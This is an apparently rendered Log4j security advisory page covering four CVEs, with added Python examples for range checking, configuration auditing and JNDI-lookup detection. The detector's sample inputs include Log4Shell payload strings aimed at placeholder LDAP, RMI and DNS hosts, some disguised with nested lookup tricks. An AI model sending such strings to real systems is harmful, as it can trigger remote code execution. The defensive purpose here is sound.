<!DOCTYPE html>
<!--
| Generated by Apache Maven Doxia Site Renderer 1.11.1 from target/generated-sources/site/asciidoc/security.adoc at 2024-03-06
| Rendered using Apache Maven Fluido Skin 1.11.2
-->
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta name="generator" content="Apache Maven Doxia Site Renderer 1.11.1" />
<title>Log4j &#x2013; Security</title>
<link rel="stylesheet" href="./css/apache-maven-fluido-1.11.2.min.css" />
<link rel="stylesheet" href="./css/site.css" />
<link rel="stylesheet" href="./css/print.css" media="print" />
<script src="./js/apache-maven-fluido-1.11.2.min.js"></script>
</head>
<body class="topBarDisabled">
<div class="container-fluid">
<header>
<div id="banner">
<div class="pull-left"><a href="../.." id="bannerLeft"><img src="images/ls-logo.jpg" alt="" style="" /></a></div>
<div class="pull-right"><a href="./" id="bannerRight"><img src="images/logo.png" alt="" style="" /></a></div>
<div class="clear"><hr/></div>
</div>
<div id="breadcrumbs">
<ul class="breadcrumb">
<li id="publishDate">Last Published: 2024-03-06<span class="divider">|</span>
</li>
<li id="projectVersion">Version: 2.23.1</li>
<li class="pull-right"><span class="divider">|</span>
<a href="https://github.com/apache/logging-log4j2" class="externalLink" title="GitHub">GitHub</a></li>
<li class="pull-right"><span class="divider">|</span>
<a href="../../" title="Logging Services">Logging Services</a></li>
<li class="pull-right"><span class="divider">|</span>
<a href="https://www.apache.org/" class="externalLink" title="Apache">Apache</a></li>
<li class="pull-right"><a href="https://cwiki.apache.org/confluence/display/LOGGING/Log4j" class="externalLink" title="Logging Wiki">Logging Wiki</a></li>
</ul>
</div>
</header>
<div class="row-fluid">
<main id="bodyColumn" class="span10" >
<h1>Security</h1>
<div id="preamble">
<div class="sectionbody">
<div class="paragraph">
<p>The Apache Log4j Security Team takes security seriously.
This allows our users to place their trust in Log4j for protecting their mission-critical data.
On this page you will find guidance on security-related issues and a list of the known vulnerabilities in Log4j.</p>
</div>
<div class="admonitionblock warning">
<table>
<tr>
<td class="icon">
<div class="title">Warning</div>
</td>
<td class="content">
<div class="paragraph">
<p><a href="http://logging.apache.org/log4j/1.x">Log4j 1</a> has <a href="https://blogs.apache.org/foundation/entry/apache_logging_services_project_announces">reached End of Life</a> in 2015, and is no longer supported.
Vulnerabilities reported after August 2015 against Log4j 1 are not checked and will not be fixed.
Users should <a href="manual/migration.html">upgrade to Log4j 2</a> to obtain security fixes.</p>
</div>
</td>
</tr>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="support">Getting support</h2>
<div class="sectionbody">
<div class="paragraph">
<p>If you need help building or configuring Log4j, or help following the instructions to mitigate the known vulnerabilities listed here, please use our <a href="support.html#discussions">user support channels</a>.</p>
</div>
<div class="admonitionblock tip">
<table>
<tr>
<td class="icon">
<div class="title">Tip</div>
</td>
<td class="content">
<div class="paragraph">
<p>If you need to apply a source code patch, use the building instructions for the Log4j version that you are using.
These instructions can be found in <code>BUILDING.adoc</code> distributed with the sources.</p>
</div>
</td>
</tr>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="reporting">Reporting vulnerabilities</h2>
<div class="sectionbody">
<div class="paragraph">
<p>If you have encountered an unlisted security vulnerability or other unexpected behaviour that has a security impact, or if the descriptions here are incomplete, please report them <strong>privately</strong> to <a href="mailto:security@logging.apache.org">the Log4j Security Team</a>.</p>
</div>
<div class="admonitionblock warning">
<table>
<tr>
<td class="icon">
<div class="title">Warning</div>
</td>
<td class="content">
<div class="paragraph">
<p>Log4j&#8217;s threat model treats configuration files as trusted input controlled by the programmer; <strong>issues that require the ability to modify a configuration are not considered vulnerabilities</strong>, because the access needed to do so already implies that the attacker can execute arbitrary code.</p>
</div>
</td>
</tr>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="policy">Vulnerability handling policy</h2>
<div class="sectionbody">
<div class="paragraph">
<p>The Apache Log4j Security Team follows the <a href="https://www.apache.org/security/committers.html">ASF Project Security</a> guide for handling security vulnerabilities.</p>
</div>
<div class="paragraph">
<p>Reported security vulnerabilities are subject to a vote (preferably by <a href="https://logging.apache.org/guidelines.html"><em>lazy approval</em></a>) on the private <a href="mailto:security@logging.apache.org">security mailing list</a> before a CVE is created and its associated content populated.
This procedure applies only to the creation of CVEs; it blocks neither vulnerability fixes nor releases.</p>
</div>
</div>
</div>
<div class="sect1">
<h2 id="vdr">Vulnerability Disclosure Report (VDR)</h2>
<div class="sectionbody">
<div class="paragraph">
<p>Starting with version <code>2.22.0</code>, Log4j distributes a <a href="https://cyclonedx.org/capabilities/sbom/">CycloneDX Software Bill of Materials (SBOM)</a> along with each deployed artifact.
The produced SBOMs contain BOM-links referring to a <a href="https://cyclonedx.org/capabilities/vdr/">CycloneDX Vulnerability Disclosure Report (VDR)</a> that Apache Logging Services uses for all projects it maintains.
All of this is streamlined by <code>logging-parent</code>; see <a href="https://logging.apache.org/logging-parent/latest/#cyclonedx-sbom">its website</a> for details.</p>
</div>
</div>
</div>
<div class="sect1">
<h2 id="vulnerabilities">Known vulnerabilities</h2>
<div class="sectionbody">
<div class="paragraph">
<p>The Log4j Security Team believes that accuracy, completeness and availability of security information is essential for our users.
We choose to pool all information on this one page, allowing easy searching for security vulnerabilities over a range of criteria.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<div class="title">Note</div>
</td>
<td class="content">
<div class="paragraph">
<p>We adhere to <a href="https://maven.apache.org/enforcer/enforcer-rules/versionRanges.html">the Maven version range syntax</a> when listing the versions of affected components.
We extend this notation only with the set union operator (<code>∪</code>) to denote the union of multiple ranges.</p>
</div>
</td>
</tr>
</table>
</div>
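<div class="paragraph">
<p>The following is an added example, not code from the Log4j project: a small Python checker that parses the range notation used in the <em>Versions affected</em> rows below (Maven ranges joined with <code>∪</code>) and reports which of the CVEs on this page cover a given <code>log4j-core</code> version. Version ordering follows Maven&#8217;s rules for the qualifiers Log4j has actually used (<code>alpha</code>, <code>beta</code>, <code>rc</code>, plain releases); the <code>AFFECTED</code> table is copied from the tables on this page, and the <code>_QUALIFIER_RANK</code> ordering is the example&#8217;s own approximation of Maven&#8217;s <code>ComparableVersion</code>.</p>
</div>

```python
"""Evaluate the affected-version ranges on this page for a given log4j-core version.

Version ordering follows Maven's ComparableVersion rules closely enough for Log4j's
version strings (2.0-alpha1, 2.0-beta9, 2.0-rc2, 2.0, 2.0.1, 2.17.1, ...).
"""
import re
from typing import List, Optional, Tuple, Union

Item = Union[int, str]
Bound = Tuple[Optional[str], bool]  # (version, inclusive); version None means unbounded

# Maven qualifier order: pre-release qualifiers sort before a plain release (""), "sp" after it.
_QUALIFIER_RANK = {
    "alpha": 1, "a": 1, "beta": 2, "b": 2, "milestone": 3, "m": 3, "rc": 4, "cr": 4,
    "snapshot": 5, "": 6, "final": 6, "ga": 6, "release": 6, "sp": 7,
}


def parse_version(version: str) -> List[Item]:
    """'2.0-beta7' -> [2, 0, 'beta', 7]; digit runs become ints, letter runs stay strings."""
    items: List[Item] = []
    for piece in re.split(r"[.\-]", version.strip().lower()):
        for token in re.findall(r"\d+|[a-z]+", piece):
            items.append(int(token) if token.isdigit() else token)
    return items


def _key(item: Item):
    """Sort key: every qualifier sorts below every number (Maven: 2.0-rc1 < 2.0 < 2.0-1)."""
    if isinstance(item, int):
        return (1, item)
    return (0, _QUALIFIER_RANK[item]) if item in _QUALIFIER_RANK else (0, 8, item)


def compare_versions(left: str, right: str) -> int:
    """Return -1, 0 or 1. A missing trailing item counts as 0 or as the release qualifier."""
    a, b = parse_version(left), parse_version(right)
    for i in range(max(len(a), len(b))):
        x: Optional[Item] = a[i] if i < len(a) else None
        y: Optional[Item] = b[i] if i < len(b) else None
        if x is None:
            x = 0 if isinstance(y, int) else ""
        if y is None:
            y = 0 if isinstance(x, int) else ""
        if _key(x) != _key(y):
            return -1 if _key(x) < _key(y) else 1
    return 0


def parse_ranges(spec: str) -> List[Tuple[Bound, Bound]]:
    """Parse '[2.0-beta7, 2.3.2) ∪ [2.4, 2.12.4)' into (low, high) bound pairs."""
    ranges: List[Tuple[Bound, Bound]] = []
    for part in spec.split("∪"):
        m = re.fullmatch(r"([\[(])\s*([^,\s]*)\s*,\s*([^,\s\])]*)\s*([\])])", part.strip())
        if not m:
            raise ValueError(f"unsupported range syntax: {part.strip()!r}")
        lo_br, lo, hi, hi_br = m.groups()
        ranges.append(((lo or None, lo_br == "["), (hi or None, hi_br == "]")))
    return ranges


def in_ranges(version: str, spec: str) -> bool:
    """True if version lies in any range of spec; brackets are inclusive, parentheses exclusive."""
    for (lo, lo_inclusive), (hi, hi_inclusive) in parse_ranges(spec):
        if lo is not None:
            c = compare_versions(version, lo)
            if c < 0 or (c == 0 and not lo_inclusive):
                continue
        if hi is not None:
            c = compare_versions(version, hi)
            if c > 0 or (c == 0 and not hi_inclusive):
                continue
        return True
    return False


# "Versions affected" rows for log4j-core, copied from the tables on this page.
AFFECTED = {
    "CVE-2021-44832": "[2.0-beta7, 2.3.2) ∪ [2.4, 2.12.4) ∪ [2.13.0, 2.17.1)",
    "CVE-2021-45105": "[2.0-alpha1, 2.3.1) ∪ [2.4, 2.12.3) ∪ [2.13.0, 2.17.0)",
    "CVE-2021-45046": "[2.0-beta9, 2.3.1) ∪ [2.4, 2.12.3) ∪ [2.13.0, 2.17.0)",
    "CVE-2021-44228": "[2.0-beta9, 2.3.1) ∪ [2.4, 2.12.3) ∪ [2.13.0, 2.17.0)",
    "CVE-2020-9488": "[2.0-beta1, 2.12.3) ∪ [2.13.1, 2.13.2)",
}


def affecting(version: str) -> List[str]:
    """CVEs from this page whose affected range contains the given log4j-core version."""
    return [cve for cve, spec in AFFECTED.items() if in_ranges(version, spec)]


if __name__ == "__main__":
    for v in ("2.0-beta8", "2.12.2", "2.15.0", "2.17.0", "2.17.1"):
        print(v, affecting(v) or "none of the CVEs listed here")
```

<div class="paragraph">
<p>Feed it the version reported by your build tool (for example the <code>log4j-core</code> entry in <code>mvn dependency:tree</code>) rather than a version guessed from a JAR file name, and remember that the ranges describe <code>log4j-core</code> only: an application that ships <code>log4j-api</code> without <code>log4j-core</code> is outside all of them.</p>
</div>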
<div class="sect2">
<h3 id="CVE-2021-44832"><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44832">CVE-2021-44832</a></h3>
<table class="tableblock frame-all grid-all stretch">
<colgroup>
<col style="width: 16.6666%;"/>
<col style="width: 83.3334%;"/>
</colgroup>
<tbody>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Summary</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">JDBC appender is vulnerable to remote code execution in certain configurations</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">CVSS 3.x Score &amp; Vector</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">6.6 MEDIUM (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Components affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>log4j-core</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>[2.0-beta7, 2.3.2) ∪ [2.4, 2.12.4) ∪ [2.13.0, 2.17.1)</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions fixed</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>2.3.2</code> (for Java 6), <code>2.12.4</code> (for Java 7), or <code>2.17.1</code> (for Java 8 and later)</p></td>
</tr>
</tbody>
</table>
<div class="sect3">
<h4 id="CVE-2021-44832-description">Description</h4>
<div class="paragraph">
<p>An attacker with write access to the logging configuration can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI, which can lead to remote code execution.
This issue is fixed by limiting JNDI data source names to the <code>java</code> protocol.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-44832-mitigation">Mitigation</h4>
<div class="paragraph">
<p>Upgrade to <code>2.3.2</code> (for Java 6), <code>2.12.4</code> (for Java 7), or <code>2.17.1</code> (for Java 8 and later).</p>
</div>
<div class="paragraph">
<p>In prior releases, if the JDBC Appender is in use, confirm that its data source is not configured with any protocol other than <code>java</code>.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-44832-references">References</h4>
<div class="ulist">
<ul>
<li>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44832">CVE-2021-44832</a></p>
</li>
</ul>
</div>
</div>
</div>
<div class="sect2">
<h3 id="CVE-2021-45105"><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-45105">CVE-2021-45105</a></h3>
<table class="tableblock frame-all grid-all stretch">
<colgroup>
<col style="width: 16.6666%;"/>
<col style="width: 83.3334%;"/>
</colgroup>
<tbody>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Summary</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">Infinite recursion in lookup evaluation</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">CVSS 3.x Score &amp; Vector</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">5.9 MEDIUM (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Components affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>log4j-core</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>[2.0-alpha1, 2.3.1) ∪ [2.4, 2.12.3) ∪ [2.13.0, 2.17.0)</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions fixed</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>2.3.1</code> (for Java 6), <code>2.12.3</code> (for Java 7), and <code>2.17.0</code> (for Java 8 and later)</p></td>
</tr>
</tbody>
</table>
<div class="sect3">
<h4 id="CVE-2021-45105-description">Description</h4>
<div class="paragraph">
<p>Log4j versions <code>2.0-alpha1</code> through <code>2.16.0</code> (excluding <code>2.3.1</code> and <code>2.12.3</code>) did not protect against uncontrolled recursion caused by self-referential lookups.
When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, <code>$${ctx:loginId}</code>), attackers with control over Thread Context Map (MDC) input data can craft input that contains a recursive lookup, resulting in a <code>StackOverflowError</code> that terminates the process.
This is also known as a <em>DoS (Denial-of-Service)</em> attack.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-45105-mitigation">Mitigation</h4>
<div class="paragraph">
<p>Upgrade to <code>2.3.1</code> (for Java 6), <code>2.12.3</code> (for Java 7), or <code>2.17.0</code> (for Java 8 and later).</p>
</div>
<div class="paragraph">
<p>Alternatively, this infinite recursion issue can be mitigated in configuration:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>In PatternLayout in the logging configuration, replace Context Lookups like <code>${ctx:loginId}</code> or <code>$${ctx:loginId}</code> with Thread Context Map patterns (<code>%X</code>, <code>%mdc</code>, or <code>%MDC</code>).</p>
</li>
<li>
<p>Otherwise, in the configuration, remove references to Context Lookups like <code>${ctx:loginId}</code> or <code>$${ctx:loginId}</code> whose values originate from sources external to the application, such as HTTP headers or user input.
Note that this mitigation is insufficient in releases older than <code>2.12.2</code> (for Java 7) and <code>2.16.0</code> (for Java 8 and later), as the issues fixed in those releases will still be present.</p>
</li>
</ul>
</div>
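<div class="paragraph">
<p>The following is an added example, not code from the Log4j project: a Python audit over a Log4j 2 XML configuration that implements the two configuration checks described on this page, the JDBC <code>DataSource</code> <code>jndiName</code> protocol check from the CVE-2021-44832 mitigation and the Context Lookup check from the CVE-2021-45105 mitigation above. The two configurations, the host name and the JNDI names in them are constructed for this example. It handles the XML configuration format only; JSON, YAML and properties configurations need the same two checks against their own structure.</p>
</div>

```python
"""Audit a Log4j 2 XML configuration for the two settings this page tells you to check.

Checks: (1) a JDBC appender DataSource whose jndiName is outside the java: namespace
(CVE-2021-44832); (2) Context Lookups (${ctx:...} / $${ctx:...}) in a PatternLayout,
which should be replaced by %X{...} (CVE-2021-45105 / CVE-2021-45046).
"""
import re
import xml.etree.ElementTree as ET
from typing import List

_CTX_LOOKUP = re.compile(r"\$\$?\{ctx:", re.IGNORECASE)


def audit_log4j2_config(xml_text: str) -> List[str]:
    """Return one finding per offending setting; an empty list means both checks passed."""
    findings: List[str] = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        tag = elem.tag.split("}")[-1].lower()  # tolerate a namespace prefix on elements
        if tag == "datasource" and "jndiName" in elem.attrib:
            jndi_name = elem.attrib["jndiName"]
            if not jndi_name.lower().startswith("java:"):
                findings.append(f"DataSource jndiName uses a protocol other than java: {jndi_name}")
        elif tag == "patternlayout":
            # The pattern may sit in an attribute, in a Pattern child, or in a PatternSelector.
            for node in elem.iter():
                for value in list(node.attrib.values()) + [node.text or ""]:
                    if _CTX_LOOKUP.search(value):
                        findings.append(f"PatternLayout uses a Context Lookup; use %X instead: {value.strip()}")
    return findings


# Constructed configuration for this example; the host name and JNDI names are placeholders.
VULNERABLE_CONFIG = """<Configuration status="warn">
  <Appenders>
    <Console name="Console" target="SYSTEM_OUT">
      <PatternLayout pattern="%d{ISO8601} %-5p [%t] user=$${ctx:loginId} %c{1.} - %m%n"/>
    </Console>
    <JDBC name="Db" tableName="app_log">
      <DataSource jndiName="ldap://directory.example.com/jdbc/appDs"/>
      <Column name="ts" isEventTimestamp="true"/>
      <Column name="msg" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers>
    <Root level="info"><AppenderRef ref="Console"/><AppenderRef ref="Db"/></Root>
  </Loggers>
</Configuration>
"""

# The hardened variant differs in exactly the two settings the page calls out:
# a %X{...} pattern converter instead of a Context Lookup, and a java: JNDI name.
HARDENED_CONFIG = VULNERABLE_CONFIG.replace(
    "$${ctx:loginId}", "%X{loginId}").replace(
    "ldap://directory.example.com/jdbc/appDs", "java:comp/env/jdbc/appDs")


if __name__ == "__main__":
    for name, cfg in (("vulnerable", VULNERABLE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_log4j2_config(cfg) or "no findings")
```

<div class="paragraph">
<p>Run it against every configuration file the application can load, including ones supplied through <code>log4j2.configurationFile</code>, and treat findings as a prompt to upgrade: the page is explicit that the configuration-only mitigation for the recursion issue is insufficient on releases older than <code>2.12.2</code> and <code>2.16.0</code>.</p>
</div>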
<div class="paragraph">
<p>Note that only the <code>log4j-core</code> JAR file is impacted by this vulnerability.
Applications using only the <code>log4j-api</code> JAR file without the <code>log4j-core</code> JAR file are not impacted by this vulnerability.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-45105-credits">Credits</h4>
<div class="paragraph">
<p>Independently discovered by Hideki Okamoto of Akamai Technologies, Guy Lederfein of Trend Micro Research working with Trend Micro&#8217;s Zero Day Initiative, and another anonymous vulnerability researcher.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-45105-references">References</h4>
<div class="ulist">
<ul>
<li>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-45105">CVE-2021-45105</a></p>
</li>
<li>
<p><a href="https://issues.apache.org/jira/browse/LOG4J2-3230">LOG4J2-3230</a></p>
</li>
</ul>
</div>
</div>
</div>
<div class="sect2">
<h3 id="CVE-2021-45046"><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-45046">CVE-2021-45046</a></h3>
<table class="tableblock frame-all grid-all stretch">
<colgroup>
<col style="width: 16.6666%;"/>
<col style="width: 83.3334%;"/>
</colgroup>
<tbody>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Summary</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">Thread Context Lookup is vulnerable to remote code execution in certain configurations</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">CVSS 3.x Score &amp; Vector</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">9.0 CRITICAL (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Components affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>log4j-core</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>[2.0-beta9, 2.3.1) ∪ [2.4, 2.12.3) ∪ [2.13.0, 2.17.0)</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions fixed</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>2.3.1</code> (for Java 6), <code>2.12.3</code> (for Java 7), and <code>2.17.0</code> (for Java 8 and later)</p></td>
</tr>
</tbody>
</table>
<div class="sect3">
<h4 id="CVE-2021-45046-description">Description</h4>
<div class="paragraph">
<p>The fix for <a href="#CVE-2021-44228">CVE-2021-44228</a> in Log4j <code>2.15.0</code> was found to be incomplete in certain non-default configurations.
When the logging configuration uses a non-default Pattern Layout with a Thread Context Lookup (for example, <code>$${ctx:loginId}</code>), attackers with control over Thread Context Map (MDC) input data can craft malicious input using a JNDI Lookup pattern, resulting in an information leak and remote code execution in some environments and local code execution in all environments.
Remote code execution has been demonstrated on macOS, Fedora, Arch Linux, and Alpine Linux.</p>
</div>
<div class="paragraph">
<p>Note that this vulnerability is not limited to just the JNDI lookup.
Any other Lookup could also be included in a Thread Context Map variable and possibly have private details exposed to anyone with access to the logs.</p>
</div>
<div class="paragraph">
<p>Note that only the <code>log4j-core</code> JAR file is impacted by this vulnerability.
Applications using only the <code>log4j-api</code> JAR file without the <code>log4j-core</code> JAR file are not impacted by this vulnerability.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-45046-mitigation">Mitigation</h4>
<div class="paragraph">
<p>Upgrade to Log4j <code>2.3.1</code> (for Java 6), <code>2.12.3</code> (for Java 7), or <code>2.17.0</code> (for Java 8 and later).</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-45046-credits">Credits</h4>
<div class="paragraph">
<p>This issue was discovered by Kai Mindermann of iC Consult and separately by 4ra1n.</p>
</div>
<div class="paragraph">
<p>Additional vulnerability details discovered independently by Ash Fox of Google, Alvaro Muñoz and Tony Torralba from GitHub, Anthony Weems of Praetorian, and RyotaK (@ryotkak).</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-45046-references">References</h4>
<div class="ulist">
<ul>
<li>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-45046">CVE-2021-45046</a></p>
</li>
<li>
<p><a href="https://issues.apache.org/jira/browse/LOG4J2-3221">LOG4J2-3221</a></p>
</li>
</ul>
</div>
</div>
</div>
<div class="sect2">
<h3 id="CVE-2021-44228"><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44228">CVE-2021-44228</a></h3>
<table class="tableblock frame-all grid-all stretch">
<colgroup>
<col style="width: 16.6666%;"/>
<col style="width: 83.3334%;"/>
</colgroup>
<tbody>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Summary</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">JNDI lookup can be exploited to execute arbitrary code loaded from an LDAP server</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">CVSS 3.x Score &amp; Vector</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock">10.0 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)</p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Components affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>log4j-core</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions affected</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>[2.0-beta9, 2.3.1) ∪ [2.4, 2.12.3) ∪ [2.13.0, 2.17.0)</code></p></td>
</tr>
<tr>
<th class="tableblock halign-left valign-top"><p class="tableblock">Versions fixed</p></th>
<td class="tableblock halign-left valign-top"><p class="tableblock"><code>2.3.1</code> (for Java 6), <code>2.12.3</code> (for Java 7), and <code>2.17.0</code> (for Java 8 and later)</p></td>
</tr>
</tbody>
</table>
<div class="sect3">
<h4 id="CVE-2021-44228-description">Description</h4>
<div class="paragraph">
<p>In Log4j, the JNDI features used in configurations, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI related endpoints.
An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers.</p>
</div>
<div class="paragraph">
<p>Note that only the <code>log4j-core</code> JAR file is impacted by this vulnerability.
Applications using only the <code>log4j-api</code> JAR file without the <code>log4j-core</code> JAR file are not impacted by this vulnerability.</p>
</div>
</div>
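<div class="paragraph">
<p>The following is an added example, not code from the Log4j project: detection logic in Python that flags JNDI lookup strings in untrusted input (request headers, form fields) before it reaches a logger, for use in an edge filter or in log review. It goes slightly beyond the description above in that it also resolves two documented Log4j lookup features that are used to disguise the <code>${jndi:</code> prefix, the <code>${lower:&#8230;}</code>/<code>${upper:&#8230;}</code> lookups and the <code>${name:-default}</code> fallback syntax (see the Lookups and Configuration manual pages). The header lines and host names are constructed for this example.</p>
</div>

```python
"""Flag JNDI lookup strings in untrusted input (HTTP headers, form fields) before they are logged.

Besides the plain ${jndi:...} form this also resolves two documented Log4j lookup features
that are commonly used to hide it: ${lower:X} / ${upper:X} and the ${name:-default} fallback.
"""
import re
from typing import List

_JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)
_LOWER_UPPER = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize_lookups(text: str) -> str:
    """Resolve nested lower/upper lookups and ':-default' fallbacks from the inside out."""
    previous = None
    while previous != text:
        previous = text
        text = _LOWER_UPPER.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text)
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)
    return text


def contains_jndi_lookup(text: str) -> bool:
    """True if the text, after normalisation, contains a ${jndi:...} lookup."""
    return _JNDI_LOOKUP.search(normalize_lookups(text)) is not None


def flag_jndi_lookups(lines: List[str]) -> List[int]:
    """Indices of the lines that carry a JNDI lookup."""
    return [i for i, line in enumerate(lines) if contains_jndi_lookup(line)]


# Constructed request-header lines for this example; the hosts are placeholders.
SAMPLE_INPUTS = [
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)",
    "User-Agent: ${jndi:ldap://ldap.example.invalid/a}",
    "X-Api-Version: ${${lower:J}ndi:rmi://rmi.example.invalid/b}",
    "X-Forwarded-For: ${${::-j}${::-n}${::-d}${::-i}:dns://dns.example.invalid/c}",
    "Referer: https://shop.example.com/cart?total=${amount}",
]

if __name__ == "__main__":
    for i in flag_jndi_lookups(SAMPLE_INPUTS):
        print(f"line {i}: {SAMPLE_INPUTS[i]!r} -> {normalize_lookups(SAMPLE_INPUTS[i])!r}")
```

<div class="paragraph">
<p>Treat this as a detection aid, not a fix: the lookup syntax offers more ways to assemble the prefix than the two handled here, so input filtering can be bypassed, and the only complete remedy is the upgrade listed under Mitigation. The page also notes that any other Lookup placed in attacker-controlled data can leak private details into the logs, which a filter keyed on <code>jndi</code> alone will not catch.</p>
</div>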
<div class="sect3">
<h4 id="CVE-2021-44228-mitigation">Mitigation</h4>
<div class="sect4">
<h5 id="CVE-2021-44228-mitigation-log4j1">Log4j 1 mitigation</h5>
<div class="admonitionblock warning">
<table>
<tr>
<td class="icon">
<div class="title">Warning</div>
</td>
<td class="content">
<div class="paragraph">
<p><a href="http://logging.apache.org/log4j/1.x">Log4j 1</a> has <a href="https://blogs.apache.org/foundation/entry/apache_logging_services_project_announces">reached End of Life</a> in 2015, and is no longer supported.
Vulnerabilities reported after August 2015 against Log4j 1 are not checked and will not be fixed.
Users should <a href="manual/migration.html">upgrade to Log4j 2</a> to obtain security fixes.</p>
</div>
</td>
</tr>
</table>
</div>
<div class="paragraph">
<p>Log4j 1 does not have Lookups, so the risk is lower.
Applications using Log4j 1 are vulnerable to this attack only when they use JNDI in their configuration.
A separate CVE (<a href="https://nvd.nist.gov/vuln/detail/CVE-2021-4104">CVE-2021-4104</a>) has been filed for this vulnerability.
To mitigate, audit your logging configuration to ensure it has no <code>JMSAppender</code> configured.
Log4j 1 configurations without <code>JMSAppender</code> are not impacted by this vulnerability.</p>
</div>
</div>
<div class="sect4">
<h5 id="CVE-2021-44228-mitigation-log4j2">Log4j 2 mitigation</h5>
<div class="paragraph">
<p>Upgrade to Log4j <code>2.3.1</code> (for Java 6), <code>2.12.3</code> (for Java 7), or <code>2.17.0</code> (for Java 8 and later).</p>
</div>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-44228-credits">Credits</h4>
<div class="paragraph">
<p>This issue was discovered by Chen Zhaojun of Alibaba Cloud Security Team.</p>
</div>
</div>
<div class="sect3">
<h4 id="CVE-2021-44228-references">References</h4>
<div class="ulist">
<ul>
<li>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-44228">CVE-2021-44228</a></p>
</li>
<li>
<p><a href="https://issues.apache.org/jira/browse/LOG4J2-3198">LOG4J2-3198</a></p>
</li>
<li>
<p><a href="https://issues.apache.org/jira/browse/LOG4J2-3201">LOG4J2-3201</a></p>
</li>
</ul>
</div>
</div>
</div>
<div class="sect2">
